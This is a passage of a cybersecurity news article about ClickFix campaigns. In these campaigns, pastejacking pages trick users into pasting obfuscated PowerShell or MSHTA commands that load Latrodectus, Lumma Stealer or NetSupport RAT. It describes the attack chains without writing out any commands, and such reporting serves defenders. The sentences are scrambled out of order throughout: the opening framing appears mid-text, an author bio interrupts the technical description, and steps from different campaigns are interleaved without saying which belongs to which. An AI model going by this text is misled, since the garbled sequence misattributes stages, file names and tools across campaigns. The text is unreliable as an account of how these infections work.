A carefully crafted landing page instructs victims to open the Run dialog (Win+R) and paste an injected PowerShell command, which subsequently downloads a ZIP archive containing a malicious DLL loader. At the heart of the ClickFix vector is pastejacking: JavaScript on a malicious webpage overwrites the user’s clipboard with an obfuscated command string and displays innocuous instructions to “verify” or “fix” an issue. Emerging in late 2024 and surging throughout the first half of 2025, ClickFix has become a pervasive social-engineering vector in which threat actors trick users into executing malicious commands under the guise of “quick fixes” for common computer issues. When executed, the command uses curl.exe to fetch a JavaScript downloader that retrieves an MSI installer, which sideloads Latrodectus as a malicious DLL (libcef.dll) within a legitimate process. As Palo Alto Networks researchers noted, each victim receives a unique MSHTA command that downloads a heavily obfuscated, Base64-encoded PowerShell script. This script drops and executes an AutoIt-based loader (PartyContinued.exe), which unpacks a CAB archive (Boat.pst) and constructs an AutoIt3 engine binary (Slovenia.com) to launch the Lumma payload. Rather than relying on exploit kits or malicious attachments, attackers employ clipboard hijacking—injecting obfuscated commands into the victim’s clipboard—and instructing them to paste and run these commands via Windows shell shortcuts such as Win+R or Win+X. This DLL sideloads itself via a legitimate Java executable (jp2launcher.exe), retrieves encrypted payloads (data_3.bin and data_4.bin) using curl.exe, and ultimately launches NetSupport RAT’s client32.exe in memory. Victims visiting compromised websites are redirected to fake verification pages that inject an encoded PowerShell command into the clipboard. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Once executed, the script reaches out to the attacker’s C2, retrieves the next-stage loader, and initiates the multi-stage infection chain. The loader then executes a series of command-line operations (cmd /c md, copy /b, choice) to extract, assemble, and run the stealer without further user interaction. Upon pasting into the Run dialog or terminal, the victim unwittingly executes a script that downloads and stages additional components.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 18 Jul 2025 08:35:30 +0000